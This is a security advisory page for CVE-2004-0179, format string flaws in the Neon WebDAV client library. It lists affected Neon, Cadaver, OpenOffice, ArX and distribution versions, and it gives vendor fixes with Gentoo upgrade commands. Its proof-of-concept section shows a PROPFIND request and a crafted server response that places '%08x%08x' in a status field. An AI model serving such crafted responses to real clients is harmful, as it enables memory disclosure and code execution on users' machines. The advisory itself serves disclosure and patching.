Neon WebDAV Client Library Format String Vulnerabilities

BID:10136

Info

Neon WebDAV Client Library Format String Vulnerabilities

Bugtraq ID: 10136
Class: Input Validation Error
CVE: CVE-2004-0179
Remote: Yes
Local: No
Published: Apr 14 2004 12:00AM
Updated: Jul 12 2009 04:06AM
Credit: Discovery of this issue is credited to Thomas Wana <[email protected]>.
Vulnerable: sitecopy sitecopy 0.13.4
sitecopy sitecopy 0.13.3
SGI ProPack 2.4
SGI ProPack 2.3
Redhat Linux 9.0 i386
Redhat Linux 7.3
Redhat Fedora Core1
Redhat Enterprise Linux WS 2.1
Redhat Enterprise Linux ES 2.1
Redhat Enterprise Linux AS 2.1
Redhat Advanced Workstation for the Itanium Processor 2.1
OpenOffice OpenOffice 1.1.52
OpenOffice OpenOffice 1.1.51
OpenOffice OpenOffice 1.1.2
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
OpenOffice OpenOffice 1.1.1
OpenOffice OpenOffice 1.1 .0
OpenOffice OpenOffice 1.0.3
OpenOffice OpenOffice 1.0.1
Netwosix Netwosix Linux 1.1
Netwosix Netwosix Linux 1.0
Neon Client Library 0.24.4
Neon Client Library 0.24.3
Neon Client Library 0.24.2
Neon Client Library 0.24.1
Neon Client Library 0.24
Neon Client Library 0.23.8
Neon Client Library 0.23.7
Neon Client Library 0.23.6
Neon Client Library 0.23.5
Neon Client Library 0.23.4
Neon Client Library 0.23.3
Neon Client Library 0.23.2
Neon Client Library 0.23.1
Neon Client Library 0.23
Neon Client Library 0.19.3
- Debian Linux 3.0 sparc
- Debian Linux 3.0 s/390
- Debian Linux 3.0 ppc
- Debian Linux 3.0 mipsel
- Debian Linux 3.0 mips
- Debian Linux 3.0 m68k
- Debian Linux 3.0 ia-64
- Debian Linux 3.0 ia-32
- Debian Linux 3.0 hppa
- Debian Linux 3.0 arm
- Debian Linux 3.0 alpha
- Debian Linux 3.0
Mandriva Linux Mandrake 10.0 AMD64
Mandriva Linux Mandrake 10.0
Gentoo Linux 1.4 _rc3
Gentoo Linux 1.4 _rc2
Gentoo Linux 1.4 _rc1
Gentoo Linux 1.4
Gentoo Linux 1.2
Gentoo Linux 1.1 a
Gentoo Linux 0.7
Gentoo Linux 0.5
Cadaver WebDAV Client 0.22.1
Cadaver WebDAV Client 0.22
+ Redhat Linux 9.0 i386
Cadaver WebDAV Client 0.21
Cadaver WebDAV Client 0.20.5
Cadaver WebDAV Client 0.20.4
Cadaver WebDAV Client 0.20.3
Cadaver WebDAV Client 0.20.2
Cadaver WebDAV Client 0.20.1
Cadaver WebDAV Client 0.20
ArX Distributed Revision Control System 1.0.18
ArX Distributed Revision Control System 1.0.17
ArX Distributed Revision Control System 1.0 pre16
ArX Distributed Revision Control System 1.0 pre15
ArX Distributed Revision Control System 1.0 pre14
ArX Distributed Revision Control System 1.0 pre13
ArX Distributed Revision Control System 1.0 pre12
ArX Distributed Revision Control System 1.0 pre11
ArX Distributed Revision Control System 1.0 pre10
Not Vulnerable: Neon Client Library 0.24.5
ArX Distributed Revision Control System 1.0.19

Discussion

Neon WebDAV Client Library Format String Vulnerabilities

It has been reported that the Neon client library is prone to multiple remote format string vulnerabilities. This issue is due to a failure of the application to properly implement format string functions.

Ultimately this vulnerability could allow for execution of arbitrary code on the system implementing the affected client software, which would occur in the security context of the server process.

Exploit / POC

Neon WebDAV Client Library Format String Vulnerabilities

It has been reported that the following XML request/response sequence will be sufficient to trigger this issue:

Request
- -------

PROPFIND /example/resource/string/ HTTP/1.1
Pragma: no-cache
Cache-control: no-cache
Accept: text/*, image/jpeg, image/png, image/*, */*
Accept-Encoding: x-gzip, gzip, identity
Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Host: www.example.com
Depth: 0

Response
- --------

HTTP/1.1 207 Multi-Status
X-Cocoon-Version: 2.1
Set-Cookie: JSESSIONID=cookie_data; Path=/example
Content-Type: text/xml
Transfer-Encoding: chunked


&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;D:multistatus xmlns:D="DAV:"&gt;

&lt;D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"&gt;
&lt;D:href&gt;/lenya/blog/authoring/entries/2003/08/24/peanuts/&lt;/D:href&gt;
&lt;D:propstat&gt;
&lt;D:prop&gt;
&lt;lp1:resourcetype&gt;&lt;D:collection/&gt;&lt;/lp1:resourcetype&gt;
&lt;D:getcontenttype&gt;httpd/unix-directory&lt;/D:getcontenttype&gt;
&lt;/D:prop&gt;
&lt;D:status&gt;%08x%08x&lt;/D:status&gt;
&lt;/D:propstat&gt;
&lt;/D:response&gt;

&lt;/D:multistatus&gt;

Solution / Fix

Neon WebDAV Client Library Format String Vulnerabilities

Solution:
The vendor has released an upgrade that deals with this issue.

Gentoo has released an advisory (GLSA 200405-25:02). This advisory announces the release of a new tla eBuild to address the issues reported in this BID. Gentoo have recommended that tla users upgrade to tla current by issuing the following sequence of commands as a superuser:
emerge sync
emerge -pv ">=dev-util/tla-1.2-r2"
emerge ">=dev-util/tla-1.2-r2"

Gentoo have released an advisory (GLSA 200405-01). This advisory announces the release of a new neon eBuild to address the issues reported in this BID. Gentoo have recommended that Neon users upgrade to neon version 0.24.5 or later by issuing the following sequence of commands as a superuser:
emerge sync
emerge -pv ">=net-misc/neon-0.24.5"
emerge ">=net-misc/neon-0.24.5"

SGI has released an advisory 20040404-01-U and fixes to address this issue. Please see referenced advisory for further details regarding obtaining and applying appropriate fixes. Fixes are linked below.

Red Hat has released an advisory (RHSA-2004:157-06) and fixes to address this issue on Red Hat Linux Enterprise platforms. Customers who are affected by this issue are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

Redhat advisory RHSA-2004:158-01 along with fixes has been released dealing with this issue.

SUSE has released an advisory SuSE-SA:2004:009 to address this and other issues. Please see the advisory for more information.

Redhat advisory RHSA-2004:159-01 along with fixes has been released dealing with this issue. This advisory contains updated subversion packages. Please see the referenced advisory for more information.

OpenPKG has released advisory OpenPKG-SA-2004.016 as well as a fix dealing with this issue. Please see the referenced advisory for more information, and below for the updated fix.

Debian has released advisory DSA 487-1 to address this issue. Please see the attached advisory for further details on obtaining and applying fixes.

Gentoo has released updates to address these issues, which may be applied with the following commands:
# emerge sync
# emerge -pv ">=net-misc/cadaver-0.22.1"
# emerge ">=net-misc/cadaver-0.22.1"

Netwosix has released an advisory LNSA-#2004-0012 with fix information to address these issues. Please see the referenced advisory for more information.

Mandrake has released advisory MDKSA-2004:032 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.

Red Hat has released advisory RHSA-2004:163-01 and fixes dealing with this issue for their affected OpenOffice packages for Red Hat Linux 9.0. Please see the attached advisory for more information and details on obtaining fixes.

Gentoo has released an advisory (GLSA 200405-04) for OpenOffice, which uses the neon library. Please see the attached advisory for more information and details on obtaining fixes.

Gentoo openoffice users on the x86 architecture should:
# emerge sync
# emerge -pv ">=app-office/openoffice-1.1.1-r1"
# emerge ">=app-office/openoffice-1.1.1-r1"

Gentoo openoffice users on the sparc architecture should:
# emerge sync
# emerge -pv ">=app-office/openoffice-1.1.0-r3"
# emerge ">=app-office/openoffice-1.1.0-r3"

Gentoo openoffice users on the ppc architecture should:
# emerge sync
# emerge -pv ">=app-office/openoffice-1.0.3-r1"
# emerge ">=app-office/openoffice-1.0.3-r1"

Gentoo openoffice-ximian users should:
# emerge sync
# emerge -pv ">=app-office/openoffice-ximian-1.1.51-r1"
# emerge ">=app-office/openoffice-ximian-1.1.51-r1"

Red Hat Fedora has released advisory FEDORA-2004-103 dealing with these issues for their Fedora Linux project. Please see the referenced advisory for more information.

Gentoo has released an advisory (GLSA 200406-03) providing fixes for sitecopy, which includes the vulnerable neon library. Fixes may be applied by the superuser with the following commands:
emerge -pv unmerge net-misc/sitecopy
emerge unmerge net-misc/sitecopy

Mandrake Linux has released advisory MDKSA-2004:078 addressing this issue. Please see the referenced advisory for further information.

The Fedora Legacy project has released advisory FLSA:1552 along with fixes to address this issue for RedHat Linux 7.3 and 9.0. Please see the referenced advisory for further information.


Redhat Fedora Core1

Neon Client Library 0.19.3

Cadaver WebDAV Client 0.22

Cadaver WebDAV Client 0.22.1

Neon Client Library 0.24

Neon Client Library 0.24.1

Neon Client Library 0.24.2

Neon Client Library 0.24.3

Neon Client Library 0.24.4

ArX Distributed Revision Control System 1.0 pre16

ArX Distributed Revision Control System 1.0 pre11

ArX Distributed Revision Control System 1.0 pre10

ArX Distributed Revision Control System 1.0 pre13

ArX Distributed Revision Control System 1.0 pre15

ArX Distributed Revision Control System 1.0 pre12

ArX Distributed Revision Control System 1.0 pre14

ArX Distributed Revision Control System 1.0.17

ArX Distributed Revision Control System 1.0.18

OpenOffice OpenOffice 1.1.2

SGI ProPack 2.3

SGI ProPack 2.4

References

Neon WebDAV Client Library Format String Vulnerabilities

References:
© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report